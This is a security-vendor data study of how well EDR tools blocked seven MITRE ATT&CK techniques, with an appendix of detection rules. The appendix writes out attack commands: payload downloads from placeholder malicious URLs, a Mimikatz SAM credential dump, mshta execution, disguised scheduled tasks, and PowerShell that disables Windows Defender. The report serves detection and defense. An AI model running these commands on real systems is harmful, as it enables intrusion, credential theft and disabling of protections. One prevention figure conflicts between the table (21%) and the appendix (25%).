
DATA STUDY REPORT

Ending the Era of Security Control Failure

A data analytic study of historic security control failures against top MITRE ATT&CK techniques – and what to do to improve security program performance.

By Ken Towne, Jonathan Reiber, Shravan Ravi, and Jackson Wells


Introduction: How to become a peak performing team

Test and train like the best

After decades of spending on cybersecurity teams and technologies, from next-generation firewalls to the Department of Defense’s Cyber Mission Force, the entire industry is transitioning away from a period of hyper-focus on investment and towards a focus on outcomes and metrics in security effectiveness. This transition was driven by two distinct events: the escalating threat in cyberspace, from the Russian government’s intrusions into critical infrastructure to ransomware attacks on civil infrastructure, and the second but related feeling that the investments made over the last decade were failing to stop intruders. Even as security teams invested in the people and technologies required to stop breaches, intruders kept breaking through.

The Verizon Data Breach Investigation team in 2018 found that most breaches in cyberspace should have been stopped by existing security controls but weren’t. We knew this trend was occurring but didn’t have verifiable data about security program performance. To understand the degree of security effectiveness within our customer base, we anonymized customer data from our cloud platform in 2021 to identify the top MITRE ATT&CK techniques that succeeded against endpoint detection and response (EDR) security controls. We chose EDR for two reasons: it is the most broadly adopted control across the industry, and AttackIQ has a history of developing scenario content to emulate the adversary, aligned to the MITRE ATT&CK framework, to test EDR controls. We then examined a list of top MITRE ATT&CK techniques that break past our customers’ detection capabilities.

The findings from our study are that on average, the EDR controls in our customers’ environments only stopped the top seven adversary techniques 39 percent of the time in 2021. This high degree of failure is not the fault of security providers, as their controls stop the top techniques in our laboratory environment. Nor is it the fault of our customers, who are some of the most advanced cybersecurity teams in the world. The problem is embedded in the system itself.

Complex organisms and organizations need data to understand how well their inner workings are performing. Like car engines, the human body, or the U.S. military (which has for years conducted multi-factor analyses of its “readiness” to perform key missions), security controls of people, processes, and technologies need to be assessed constantly against real threats to validate their effectiveness. A car engine has a check engine light. The human body goes to regular check-ups, and now human beings wear wearable devices to track their pulse, exercise and steps taken, and oxygenation. The U.S. military trains constantly on land, air, sea, space, and cyberspace to prepare for potential conflicts. Unlike the human body, a car engine, or the U.S. military, however, cybersecurity teams have until now lacked a means to exercise, measure, and report on their health. The result is a mismatch. Even the most effective technologies and the most effective teams will fail to stop the adversary part of the time if they do not test and train.

Imagine a World Cup qualifying team that made it to the first match but had failed to prepare for its opponents. Stepping out on the pitch, the opposing team would run circles around them. This is the story in cybersecurity today. The impact of a lack of continuous assessment is that breaches continue to occur, and adversaries continue to succeed. In our historical analysis, we found that the top 7 techniques have been used over and over in impactful cyberattacks and intrusions by adversaries like the Conti ransomware gang and state-sponsored actors from Russia, China, Iran, North Korea, and others to achieve their strategic objectives. We outline the historic impact of these techniques below.

The problem is not that the defense capabilities aren’t up to the task. Quite the opposite. From our laboratory environment at AttackIQ, we know that leading EDR technologies and our customers can stop these top seven techniques consistently, and therefore our customers should be able to do so consistently as well. The issue is that organizations aren’t testing enough. Information technology, like the human body, is not static. Misconfigurations, infrastructure changes, and team transitions all lead to degraded security control performance over time. Only by testing controls against known threats can teams generate the data they need to understand performance, tune up, and improve effectiveness. That’s how they can become a World Cup team.

The Seven Deadly Techniques

How did we arrive at this 39 percent statistic? We looked at our customers’ historical performance against a curated list of techniques to see how well they performed. The goal in selecting these techniques was to find a sweet spot for realistic and popular techniques that could be prevented by recommended security configurations but are not currently being prevented most of the time. We chose these key techniques because they fit the following criteria:

1. They match real-world attacks from threat actors that should concern our customers, and their engineering implementation is accurate.
2. Their usage is common; in other words, they are not edge cases that are infrequently reported.
3. They are core functional techniques that help a threat actor achieve their goals.
4. Laboratory evidence shows that the recommended configuration settings of EDR solutions should be able to prevent the execution of these techniques.
5. Our customers show that these techniques can be prevented in their environments, proving that our prevention measurements are not just theoretical but practical and real world.

So, what are they not? They are not a top list of individual techniques by priority or popularity. Other organizations have taken this approach (to include the Center for Threat-Informed Defense, of which we are a founding research partner). Instead, this list represents a solid foundation of techniques that a customer will see and which our research indicates they will likely fail to prevent. Our historical data also shows that by testing against these techniques, customers can adjust their EDR configurations to improve security control performance.

Below are the scenarios and techniques that comprise the “Seven Deadly Techniques.” The column on the left names the AttackIQ scenario (a software-based logical combination of adversary behaviors) that contains the technique within it. The middle column names the known technique from the MITRE ATT&CK framework of known adversary tactics, techniques, and procedures, the world’s leading repository of threat intelligence and threat behavior. The column on the right shows how often these techniques are prevented by EDR technologies in our customers’ environments. Of note, because the data is anonymized, we do not have clear visibility into our customers’ networks to know why a specific EDR solution failed to prevent a specific technique. We may pursue such analysis in the future, building on the research methodologies we developed in the context of our first report.

AttackIQ Scenario Name | MITRE ATT&CK Technique | Number | % Prevention*
1. BITS Jobs Script | BITS Jobs | T1197 | 40%
2. Deobfuscate / Decode Files or Information Script | Deobfuscate/Decode Files or Information | T1140 | 42%
3. Dump SAM hashes with Mimikatz using a Volume Shadow Copy | OS Credential Dumping: Security Account Manager | T1003.002 | 64%
4. Mshta Script | System Binary Proxy Execution: Mshta | T1218.005 | 48%
5. Remote File Copy Script | Ingress Tool Transfer | T1105 | 34%
6. Scheduled Task Masquerading | Scheduled Task/Job: Scheduled Task | T1053.005 | 25%
7. Stop Windows Defender via Encoded Powershell Script | Impair Defenses: Disable or Modify Tools | T1562.001 | 21%

Figure 1: The Seven Deadly Techniques (2021)


Historic Real-World Impact of the Seven Deadly Techniques

Part of the reason we selected these techniques (and our scenarios that emulate them in our platform) is because of their historical success in significant breaches. Below are some of the historical impacts of these seven techniques on organizations and how they have been used by adversaries.

1. Scenario: Dump SAM hashes with Mimikatz using a Volume Shadow Copy

OS Credential Dumping: Security Account Manager (T1003.002): The Security Account Manager (SAM) is a database in Microsoft Windows that stores account passwords and can be used to authenticate local or remote users. The account passwords are hashed and stored in a registry hive. Threat actors target this file with many different tools including pwdump, gsecdump, and mimikatz to dump the SAM database from memory or on disk using volume shadow copies. The hashes can then be cracked offline to recover user passwords. This technique has been used not only by nation state-sponsored actors like APT29 but also by cybercriminals like Conti to help facilitate ransomware attacks. Although Conti has disbanded (good riddance!) its techniques continue to live on (sigh) in new ransomware groups, to include groups which former Conti members have joined.

2. Scenario: Remote File Copy Script

Ingress Tool Transfer (T1105) | Command and Scripting Interpreter: PowerShell (T1059.001): PowerShell is one of the most common sources of threats detected on endpoints. Using legitimate built-in functionality, an actor can launch directly from the command line and instruct PowerShell to retrieve a file from a URL and then execute their malicious payload. The destructive attacks used against Ukraine used this exact technique to load their initial tools in the beginning stages of their attack.

3. Scenario: Deobfuscate / Decode Files or Information Script

Ingress Tool Transfer (T1105) | Deobfuscate/Decode Files or Information (T1140): Certutil is a command-line tool natively found on Microsoft Windows systems that is meant to be used to help validate and verify certificate authority information. The legitimate functionality of this tool can be misused by threat actors to download remote payloads and decode encoded files to attempt to bypass security detection controls. Actors have been taking advantage of this tool since at least 2016, and it has been employed by the likes of APT10 (China), APT28 (Russia), Oil Rig (Iran), and Konni (North Korea).

4. Scenario: Mshta Script

System Binary Proxy Execution: Mshta (T1218.005): Mshta is a native binary found on Microsoft Windows systems that opens HTML Application (HTA) files which can contain web scripts written in VBScript or JScript. This file format is frequently used by threat actors directly as a malicious email attachment or a file dropped and executed by macro-enabled Office documents. The Russia-linked Gamaredon group leveraged this technique in the cyberattacks during the start of the invasion of Ukraine. Additionally, actors like Mustang Panda have found that the mshta tool can be used to execute malicious script code directly in the command line.

5. Scenario: BITS Jobs Script

BITS Jobs (T1197): The Background Intelligent Transfer Service (BITS) is a file transfer mechanism found in Microsoft Windows and commonly used by legitimate applications to use the system’s available idle bandwidth without disrupting other applications. This functionality has been historically abused by multiple threat actors during their attacks. APT41 is a Chinese-sponsored threat actor who conducted global cyberespionage attacks throughout 2020 that used bitsadmin.exe to download their 2nd stage payloads. Additionally, the FBI warned about APT39, an Iranian-sponsored threat actor, using BITS to exfiltrate stolen data during their global attacks.

6. Scenario: Scheduled Task Masquerading

Scheduled Task/Job: Scheduled Task (T1053.005) | Masquerade Task or Service (T1036.004): Scheduled Tasks can be created to either initially launch a process at a pre-determined date and time or repeatedly execute commands at specific intervals. Actors leverage both options to either break up their process attack chains or for persistence to survive reboots and shutdowns. To help their malicious activities blend in and hide from analyst detection, actors will use task names that appear to be legitimate update mechanisms. The cybercriminal group Wizard Spider has used scheduled tasks named after Google and Windows applications to help facilitate their ransomware operations.

7. Scenario: Stop Windows Defender via Encoded Powershell Script

Impair Defenses: Disable or Modify Tools (T1562.001) | Command and Scripting Interpreter: PowerShell (T1059.001) | Obfuscated Files or Information (T1027): Threat actors will take overt actions to disable the security tools that could detect or prevent their future operations. PowerShell’s ability to integrate with Windows internals makes it a key tool to be abused in these attacks to help facilitate disabling Windows tools or controls. Additionally, actors encode their PowerShell commands to make the initial incident response more difficult. The Maze ransomware group used PowerShell to disable Windows Defender’s real-time monitoring before their encryption process was executed. They demanded a $15 million ransom.

Figure 2: A pyramid of prevention failures. The figure is titled “Seven Deadly Techniques”; its tiers, from top to bottom, are:

• Customers that prevented 100% of the Seven Deadly Techniques
• Customers that prevented 76% - 99% of the Seven Deadly Techniques
• Customers that prevented 51% - 75% of the Seven Deadly Techniques
• Customers that prevented 26% - 50% of the Seven Deadly Techniques
• Customers that prevented 1% - 25% of the Seven Deadly Techniques
• Customers that prevented 0% of the Seven Deadly Techniques

The axis label reads “50% Test Point Coverage”. This pyramid shows the degree to which our customers prevented the Seven Deadly Techniques on 50 percent or more of their test point assets in 2021.

Methodology

How and why do we trust these scenarios to make the 39 percent determination of average effectiveness?

All these scenarios were manually double-checked for accuracy to determine how well they match real-world actors’ use of the same techniques. In our data analysis, we measured how well the techniques performed against at least 50 percent of our host agents (which measure security control performance) in our customers’ environments. We confirmed that those scenarios were blocked by EDR tools in our internal labs and then validated that our expectation of a prevented status could be found in our external customer implementations. Finally, like the attackers themselves, all the scenarios, assessments, and attack graphs in the AttackIQ Security Optimization Platform can be used in production, at scale, and run concurrently against all a customer’s assets at once.

For those interested in the specifics, Appendix A outlines a technical analysis of the seven scenarios against real-world examples. Finally, it should be noted that all these scenarios were run as SYSTEM, which means they are running with the highest privileges possible on the host. This means that if AttackIQ’s Security Optimization Platform measures a prevention at that level, it would measure a prevention at a lower level as well. When we ran our tests in the AttackIQ labs, we ran the scenarios with the highest system-level permissions instead of downgrading the agents’ permissions with a lower-level user account. This ensured that any preventions we recorded were the result of an EDR’s behavioral-based detection instead of a permissions issue. If the EDR could prevent the system account performing these actions, it would prevent a standard account from performing that same action. If we did the reverse, we might incorrectly assume an EDR control prevented the scenario when the reality is that a normal account simply cannot access that resource. Any skilled threat actor would have already escalated their privileges before attempting to use those techniques, so it is also a more realistic representation. One caveat is that it is possible that running as a lower privileged user would increase the prevention counts – which could appear positive. The more likely outcome, however, is that an experienced attacker would properly escalate their privileges prior to conducting those techniques.

If an organization cannot prevent these techniques as a privileged user, it will struggle when the adversary escalates their privileges within their environment. An EDR runs to stop specific behaviors, not access permissions. The EDR will be agnostic to the type of user running and focus instead on the kinds of behaviors being run. These preventions do not occur only in the lab: given that our customers are preventing the techniques to some degree, we know they are preventable in the real world. Some customers must be following similar policies, or they wouldn’t be preventing the techniques. The fact that the customers and EDR solutions are stopping such techniques at an atomic level is good news.

Conclusion: Elevating Cybersecurity Effectiveness

Security teams can improve their cybersecurity readiness through continuous testing and security control validation, running assessments aligned to the MITRE ATT&CK framework against the total security program. AttackIQ built the world’s first Security Optimization Platform to run assessments and comprehensive adversary emulations, to include the AttackIQ Attack Graphs, to emulate the adversary with specificity and realism. AttackIQ then generates real-time performance data that your security team can use to measure effectiveness over time or at a single moment in time to make data- and threat-informed decisions about security program performance. This is what it means to adopt a threat-informed defense. To help organizations adopt a threat-informed defense strategy, AttackIQ is a founding research partner of the Center for Threat-Informed Defense at MITRE Engenuity, advancing the state of the art and the state of the practice to help improve the world’s cybersecurity effectiveness. Other founding research partners include JPMorgan Chase, Bank of America, Citi, Fortinet, HCA Healthcare, and IBM Security.

Figure 3: AttackIQ Attack Graph response to US-CERT AA22-083A, HAVEX malware targeting the energy sector.

Figure 4: Illustrative examples of historic, graphical data of security control performance against an assessment.

The impact of continuous security control validation and a threat-informed defense strategy is significant, and can help drive down security control failures and elevate cybersecurity effectiveness. A study by the analyst firm IDC of existing AttackIQ customers found that “substantial benefits were achieved as a result of deploying AttackIQ to test cybersecurity readiness and validate the effectiveness of security programs. Specifically, they noted significant improvements in the efficiency of security staff and risk reduction, the importance of purple teaming, and the value of AttackIQ Academy”, the company’s free online course in breach and attack simulation and the practice of threat-informed defense. The IDC report of AttackIQ customers found that continuous security control validation led to 47 percent more efficient security operations teams, a 44 percent reduction in potential costs of security breaches, and 35 percent less impactful breaches overall.[1]

Finally, the IDC study found that by aligning red teams and blue teams in a process of purple teaming for continuous testing, organizations could save at least $4.7 million in threat response expenditures. When asked why this was the case, one customer said, “Business risk has been reduced, because with AttackIQ we can measure where things work well. If something isn’t working, we can take steps to address that.” By running adversary emulations against an organization’s security program, an organization[2] can improve its performance against key adversaries like APT29, the Conti Ransomware Group, or Muddy Waters, to name a few of the organizations that have employed the Seven Deadly Techniques throughout recent history. By embracing a heuristic-focused defense capability, investing in a defense-in-depth strategy that protects high-value assets and adopts an assume-breach mindset, and by deploying a threat-informed defense strategy for continuous security control validation, customers can generate real-time data to elevate their security program effectiveness and keep intruders out.

[1] Source: IDC Infographic, sponsored by AttackIQ, The Business Value of AttackIQ Security Optimization Platform, doc #US49454222, July 2022.
[2] Ibid.
Appendix A

This technical appendix shows how our scenarios closely match real-world techniques. It then discusses mitigation processes and offers Sigma rules for improving customers’ detection of these techniques.

Mitigation process:

1. BITS Job Script: This scenario uses the Background Intelligent Transfer Service (BITS) to download a remote payload to a temporary directory. This is a mechanism found in Microsoft Windows and commonly used by legitimate applications to use the system’s available idle bandwidth to retrieve files without disrupting other applications.

A PowerShell script is executed on the targeted host and executes the following commands to create and stage a file to be downloaded from a remote server:

- bitsadmin /Create AIQDownloadJob
- bitsadmin /SetCustomHeaders <job id> "Authorization: Basic <password>" >$null 2>&1
- bitsadmin /SetPriority <job id> "FOREGROUND" >$null 2>&1
- bitsadmin /AddFile <job id> "<malicious url>" "$env:TMP\attackiq_bits_jobs\evil.exe"

Then the following commands are executed to begin the BITS job transfer, monitor progress for successful transfer, and mark the job complete:

- bitsadmin /Resume <job id>
- bitsadmin /info $global:job_id /verbose
- bitsadmin /Complete $job_id

Our scenario activity is a direct match with (or similar to) the following reported examples:

- Mandiant Report on BITS Abuse - bitsadmin /addfile download <malicious url> C:\windows\malware.exe | bitsadmin /resume download
- Prometheus TDS - bitsadmin /addfile EncodingFirm <malicious url> C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp
- Ferocious Kitten - bitsadmin /addfile pdj "<malicious url>" %PUBLIC%\AppData\Libs\p.b | bitsadmin /resume pdj
- APT41 - bitsadmin /transfer bbbb <malicious url> C:\Users\Public\install.bat
- Egregor Ransomware - bitsadmin /transfer debjob /download /priority normal <malicious url> C:\Windows\b.dll

Detection details:

With an EDR or SIEM product, you can create detections to look for suspicious use of the Bitsadmin tool on Windows devices by using the following detection logic:

Process Name == ("cmd.exe" OR "powershell.exe")
Command Line CONTAINS ("/transfer" OR ("/addfile" AND "download"))
Username NOT IN <List of expected Bitsadmin users>

Mitigation details:

MITRE has provided the following mitigation steps for BITS Jobs (T1197):
• M1037 - Filter Network Traffic
• M1028 - Operating System Configuration
• M1018 - User Account Management

Customer prevention statistics for this scenario: 29 prevented out of 72 run, with a
prevention rate of 40 percent.

Mitigation process:

2. Deobfuscate / Decode Files or Information Script: This scenario uses certutil.exe to decode a base64 file into a malicious executable. Certutil is a command-line tool natively found on Microsoft Windows systems that is meant to be used to help validate and verify certificate authority information. The certificate authority files are commonly encoded in base64, so the tool has the built-in functionality to decode this common encoding format.

A batch file is executed on the targeted host, and it launches certutil.exe with the following arguments to decode a base64-encoded executable into a binary named “calc.exe” located in a temporary directory.

- certutil.exe -decode <encoded file> %temp%\attackiq_obfuscate_deobfuscate\calc.exe >nul 2>&1

Our scenario activity is a direct match for (or similar to) the following examples:

- SentinelOne Living off the Land with Certutil - certutil -decode malicious1.txt malicious.gzip
- APT28 - certutil -decode C:\Programdata\<random>.txt C:\Programdata\<random>.exe
- APT10 - certutil -decode %temp%\\<malicious file>.txt %temp%\\YjhdJ.cab
- APT10 - certutil -decode C:\ProgramData\padre1.txt C:\ProgramData\\GUP.txt
- APT34 - certutil -f -decode C:\ProgramData\Windows\Microsoft\java\dUpdateCheckers.base cUpdateCheckers.bat

Detection details:

With an EDR or SIEM product, you can create detections to look for suspicious use of the Certutil binary on Windows devices by using the following detection logic:

Process Name == ("cmd.exe" OR "powershell.exe")
Command Line CONTAINS ("certutil" AND ("decode" OR "-d"))
Username NOT IN <List of expected certutil users>

Mitigation details:

It is recommended that only administrators and authorized users have access to utilizing system
interpreters such as cmd.exe and powershell.exe, as well as system binaries such as certutil.exe.
This will limit the chance of malicious actors carrying out this technique on compromised
end users.

Customer prevention statistics for this scenario: 24 prevented out of 57 run, with a 42 per-
cent prevention rate.

Mitigation process:

3. Dump SAM hashes with Mimikatz using a Volume Shadow Copy: The Security Account Manager (SAM) is a database in Microsoft Windows that stores account passwords and can be used to authenticate local or remote users. The account passwords are hashed and stored in a registry hive. The file is locked by the operating system, and it cannot normally be read by other applications. A Volume Shadow Copy is a service in Windows that makes point-in-time copies of files, including those that are normally locked and unreadable on the host. This scenario abuses Volume Shadow Copy to make a backup of that locked file, which can then be used by Mimikatz to dump credentials.

A PowerShell command is first executed to create a Volume Shadow Copy:

- (Get-WMIObject Win32_ShadowCopy -List).Create("C\\", "ClientAccessible") | Select-Object ReturnValue,ShadowID | ConvertTo-Json

Once the Volume Shadow Copy is created, the SAM hive is copied to a temporary directory. Mimikatz is then written to disk and executed with the following arguments:

- mimikatz lsadump::sam /system:C:\WINDOWS\TEMP\ai_ooqpyfg8 /sam:C:\WINDOWS\TEMP\ai_o9tdgsv8

Our scenario activity is a direct match for (or similar to) the following examples:

- WmiSploit - $NewShadowVolume = ([WMICLASS]"root\cimv2:Win32_ShadowCopy").Create("$RemotePath".SubString(0,3), "ClientAccessible")
- APT3 - mimikatz !lsadump:sam
- HackerSploit - mimikatz lsadump::sam

Detection details:

For detecting and/or preventing this attack through anti-virus, we encourage placing systems in a quarantine policy and ensuring that prevention is enabled for static and dynamic analysis results. Additionally, ensuring that AVs have updated blocklist entries for known Mimikatz signatures will help ensure that this binary will be quarantined if an attempt is made to place it on disk.

For detecting and/or preventing this attack through EDR or SIEM products, we encourage using the below detection details to alert when shadow copies are being created for the Mimikatz payload to read from:

Process Name == "powershell.exe"
Command Line CONTAINS ("Win32_ShadowCopy" AND "Create")
Username NOT IN <List of expected administrators using the ShadowCopy cmdlet>

Mitigation details:

MITRE has provided the following mitigation steps for OS Credential Dumping: Security Account Manager (T1003.002):
• M1028 - Operating System Configuration
• M1027 - Password Policies
• M1026 - Privileged Account Management
• M1017 - User Training

Customer prevention statistics for this scenario are: 59 prevented out of 91 run, with a 64
percent prevention rate.
Mitigation process:

4. Mshta Script: Mshta is a native binary found on Microsoft Windows systems that opens HTML Application (HTA) files which can contain web scripts written in VBScript or JScript. Additionally, raw script code can be passed via the command line to be directly executed. Our scenario uses that technique to get MSHTA to launch another binary.

A batch file is executed that copies a malicious executable to a temporary directory, and then MSHTA is launched with arguments containing VBScript code to open that executable.

- mshta.exe vbscript:CreateObject("Wscript.Shell").Run("%temp%\attackiq_mshta\binary.exe",0,true)(window.close) > nul 2>&1

Our scenario activity is a direct match for (or similar to) the following examples:

- Cobalt Kitty - mshta.exe [hyperlink reference not preserved in the source] language=\"vbscript\" src=\"<malicious url>\">code close</script>'
- FIN7 - vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")
- Muddy Water - mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe

Detection details:

For detecting and/or preventing this attack through EDR or SIEM products, we encourage using the below detection details to alert when mshta.exe is being used in a possibly malicious manner:

Process Name == ("cmd.exe" OR "powershell.exe")
Command Line CONTAINS ("mshta" AND "vbscript" AND ("CreateObject" OR "Execute") AND "Wscript.Shell")

Mitigation details:

MITRE has provided the following mitigation steps for System Binary Proxy Execution: Mshta
(T1218.005):
• M1042 - Disable or Remove Feature or Program
• M1038 - Execution Prevention

Customer prevention statistics for this scenario: 39 prevented out of 81 run, with a 48 percent
prevention rate.

Mitigation process:

5. Remote File Copy Script: PowerShell is one of the most common sources of threats detected
on endpoints. Using legitimate built-in functionality, an actor can launch directly from the
command line and instruct PowerShell to retrieve a file from a URL and then execute their
malicious payload. This scenario performs that behavior to download a remote file to a
temporary directory.

The following PowerShell commands are executed to download a remote malicious file:

- $webclient = New-Object System.Net.WebClient
- $webclient.DownloadFile("<malicious url>", "$env:TEMP\helloworld.exe")

Our scenario activity is a direct match for (or similar to) the following examples:

- Ukraine Wiper - powershell -c "(New-Object System.Net.WebClient).DownloadFile('<malicious url>','CSIDL_SYSTEM_DRIVE\temp\sys.tmp1')" 1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1
- CrowdStrike Blocking Malicious PowerShell Downloads - powershell.exe -windowstyle hidden $d=$env:temp+[char][byte]92+'1478810889388.js';(new-object system.net.webclient).downloadfile('http'+'<malicious url>',$d);invoke-item $d;
- Emotet - Net.WebClient.DownloadFile"($url, $env:userprofile\937.exe);

Detection details:

For detecting and/or preventing this attack through EDR or SIEM products, we encourage
using the below detection details to alert when PowerShell is being used to download files onto
the system:

Process Name == "powershell.exe"
Command Line CONTAINS (("DownloadFile" OR "Invoke-WebRequest" OR "IWR") AND "http")

Mitigation details:

MITRE has provided the following mitigation steps for Command and Scripting Interpreter:
PowerShell (T1059.001):
• M1049 - Antivirus/Antimalware
• M1045 - Code Signing
• M1042 - Disable or Remove Feature or Program
• M1038 - Execution Prevention
• M1026 - Privileged Account Management

The scenario was prevented in our labs by: Cisco and Cybereason. The scenario was detected in
our labs by: Microsoft Defender. Customer prevention statistics for this scenario: 13 prevented
out of 38 run, with a prevention rate of 34 percent.

Mitigation process:

6. Scheduled Task Masquerading: Scheduled Tasks can be created either to launch a
process once at a pre-determined date and time or to repeatedly execute commands at specific
intervals. This scenario creates a scheduled task using the native Windows utility "schtasks.exe".
The created task is named to appear as an AdobeFlashSync update, and it launches a
batch file in a temporary directory from the System account.

The scheduled task is created and set to run in 60 seconds from its initial creation.

- schtasks.exe /Create /tn AdobeFlashSync /sc once /f /tr cmd /c C:\WINDOWS\TEMP\ai-ft1qzmpe.bat /st 19:16:42 /ru system

After the task is executed, the schtasks utility is used to check to see if the task still exists and if
it was successfully executed.

- schtasks.exe /query /tn AdobeFlashSync

Our scenario activity is a direct match for (or similar to) the following examples:

- FIN7 - schtasks.exe /create /tn "AdobeFlashSync" /tr "wscript.exe //B /e:jscript \Users\{User name}\{Random GUID}\{Random values}.txt" /sc minute /mo 25
- Dark Halo - schtasks /create /F /tn "\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager" /tr "C:\Windows\SoftwareDistribution\EventCacheManager.exe" /sc ONSTART /ru system
- APT32 - schtasks /create /sc MINUTE /tn "Windows Schedule Maintenance"
- Machete - SCHTASKS /create /ST 00:00:01 /SC MINUTE /MO 03 /TR "C:\Users\%USERNAME%\AppData\Roaming\Chrome\Google\Chrome.exe" /TN Chrome

Detection details:

For detecting and/or preventing this attack through EDR or SIEM products, we encourage using
the below detection details to alert when scheduled tasks are being created:

Process Name == ("cmd.exe" OR "powershell.exe")
Command Line CONTAINS ("schtasks" AND "/create" AND ("cmd" OR "powershell") AND (".exe" OR ".bat") AND "/ru system")

Mitigation details:

MITRE's mitigations for Scheduled Task/Job: Scheduled Task (T1053.005):

• M1047 - Audit
• M1028 - Operating System Configuration
• M1026 - Privileged Account Management
• M1018 - User Account Management

Customer prevention statistics: 7 preventions out of 27 run, with a 25 percent
prevention rate.

Mitigation process:

7. Stop Windows Defender via Encoded PowerShell Script: Encoded PowerShell commands
are commonly used to obfuscate a script's true intent by making it difficult to
read or to match with an atomic signature. This scenario uses a common PowerShell
obfuscation tool to encode a PowerShell script that disables Windows Defender.

The original script is first encoded with base64 and then executed with the -EncodedCommand
parameter (the encoded string below is truncated):

- powershell.exe -InputFormat None -EncodedCommand JABNAHAAUAByAGUAZgBzAF8AQgBlAG

When decoded, the following PowerShell cmdlets are executed disabling the various components
of Windows Defender:

- Set-MpPreference -DisableRealtimeMonitoring $true
- Set-MpPreference -DisableBehaviorMonitoring $true
- Set-MpPreference -DisableBlockAtFirstSeen $true
- Set-MpPreference -DisableIOAVProtection $true
- Set-MpPreference -DisableScriptScanning $true

Our scenario activity is a direct match for or similar to the following examples:

- TrickBot - Set-MpPreference -DisableRealtimeMonitoring $true
- AV Manipulation - Set-MpPreference -DisableBehaviorMonitoring $true
- Detecting Ransomware Precursors - Set-MpPreference -DisableRealtimeMonitoring $true

Detection details:

For detecting encoded PowerShell being run, utilize the below query for EDR or SIEM
related products:

Process Name == "powershell.exe"
Command Line REGEX ((-e|-encoded) (?:[A-Za-z\d+\/]{4})*(?:[A-Za-z\d+\/]{3}=|[A-Za-z\d+\/]{2}==)?$)

For detecting plain text attempts to disable Windows Defender, utilize the below query for EDR or
SIEM related products:

Process Name == "powershell.exe"
Command Line CONTAINS ("Set-MpPreference" AND "Disable" AND "$true")
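The detection pseudo-queries from this section (shadow copy creation, mshta, PowerShell download, schtasks as SYSTEM, encoded PowerShell and Set-MpPreference), written out as an added example in Python that is not the report's own code, so they can be run over constructed process-creation events. It assumes case-insensitive substring matching, which the report's queries leave unspecified, and adds an assumed broader encoded-command pattern: the report's regex as printed only matches `-e` or `-encoded` followed by a space and base64 at the end of the line, so it does not fire on the `-EncodedCommand` form shown above; the broader pattern also lets the payload be decoded so the plaintext Set-MpPreference rule can be applied to it.

```python
import base64
import re
# Added example, not the report's code: the report's detection pseudo-queries as predicates over
# (process name, command line) events. Substring checks are case-insensitive (an assumption).
def has(cl, *words):
    return all(w.lower() in cl.lower() for w in words)

# The report's regex verbatim: "-e " or "-encoded " then base64 running to end of line, case-sensitive.
REPORT_ENCODED_RE = re.compile(r"(-e|-encoded) (?:[A-Za-z\d+/]{4})*(?:[A-Za-z\d+/]{3}=|[A-Za-z\d+/]{2}==)?$")
# Assumed broader form: the abbreviations powershell.exe accepts for -EncodedCommand, any case.
ENCODED_ARG_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z\d+/=]+)", re.IGNORECASE)

def decode_encoded_command(cl):
    # Plaintext of an -EncodedCommand payload (base64 of UTF-16LE), or None if absent or undecodable.
    m = ENCODED_ARG_RE.search(cl)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def defender_disable(cl):
    # The report's plaintext Set-MpPreference rule, applied to the command line and to any decoded payload.
    return any(has(t, "Set-MpPreference", "Disable", "$true") for t in (cl, decode_encoded_command(cl) or ""))

RULES = [
    ("shadow_copy_create", {"powershell.exe"}, lambda cl: has(cl, "Win32_ShadowCopy", "Create")),
    ("mshta_vbscript", {"cmd.exe", "powershell.exe"}, lambda cl: has(cl, "mshta", "vbscript", "Wscript.Shell")
     and (has(cl, "CreateObject") or has(cl, "Execute"))),
    ("powershell_download", {"powershell.exe"}, lambda cl: has(cl, "http")
     and any(has(cl, w) for w in ("DownloadFile", "Invoke-WebRequest", "IWR"))),
    ("schtasks_as_system", {"cmd.exe", "powershell.exe"}, lambda cl: has(cl, "schtasks", "/create", "/ru system")
     and (has(cl, "cmd") or has(cl, "powershell")) and (has(cl, ".exe") or has(cl, ".bat"))),
    ("encoded_ps_report_regex", {"powershell.exe"}, lambda cl: REPORT_ENCODED_RE.search(cl) is not None),
    ("encoded_ps_any_form", {"powershell.exe"}, lambda cl: ENCODED_ARG_RE.search(cl) is not None),
    ("defender_disable", {"powershell.exe"}, defender_disable),
]

def match_rules(process, cmdline):
    # Names of every rule that fires for one process-creation event, in RULES order.
    return [name for name, procs, pred in RULES if process.lower() in procs and pred(cmdline)]
# Constructed sample events (not from the report); the encoded ones wrap the report's Set-MpPreference cmdlet.
ENCODED = base64.b64encode("Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("powershell.exe", '(Get-WmiObject -List Win32_ShadowCopy).Create("C:\\", "ClientAccessible")'),
    ("cmd.exe", 'mshta.exe vbscript:CreateObject("Wscript.Shell").Run("%temp%\\x\\binary.exe",0,true)(window.close)'),
    ("powershell.exe", '(New-Object System.Net.WebClient).DownloadFile("http://host.invalid/a.exe","$env:TEMP\\a.exe")'),
    ("cmd.exe", 'schtasks /create /tn AdobeFlashSync /sc once /tr "cmd /c C:\\WINDOWS\\TEMP\\x.bat" /ru system'),
    ("powershell.exe", "powershell.exe -InputFormat None -EncodedCommand " + ENCODED),
    ("powershell.exe", "powershell.exe -e " + ENCODED),
    ("powershell.exe", "Get-MpPreference"),  # benign: no rule should fire
]
```

Running `match_rules` over `SAMPLE_EVENTS` shows the `-EncodedCommand` event caught only by the broader pattern and the decoded-payload check, while the `-e` form is caught by all three encoded-related rules.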

Mitigation details:

MITRE's mitigations for Impair Defenses: Disable or Modify Tools (T1562.001):

• M1022 - Restrict File and Directory Permissions
• M1024 - Restrict Registry Permissions
• M1018 - User Account Management

Customer prevention statistics: 11 prevented out of 43 run, with a 25 percent prevention rate.

AttackIQ has customers that use the AttackIQ Security Optimization Platform on their premises and disconnected
from the cloud, many in the U.S. government, and we did not have access to those customers' data during the course
of this study.
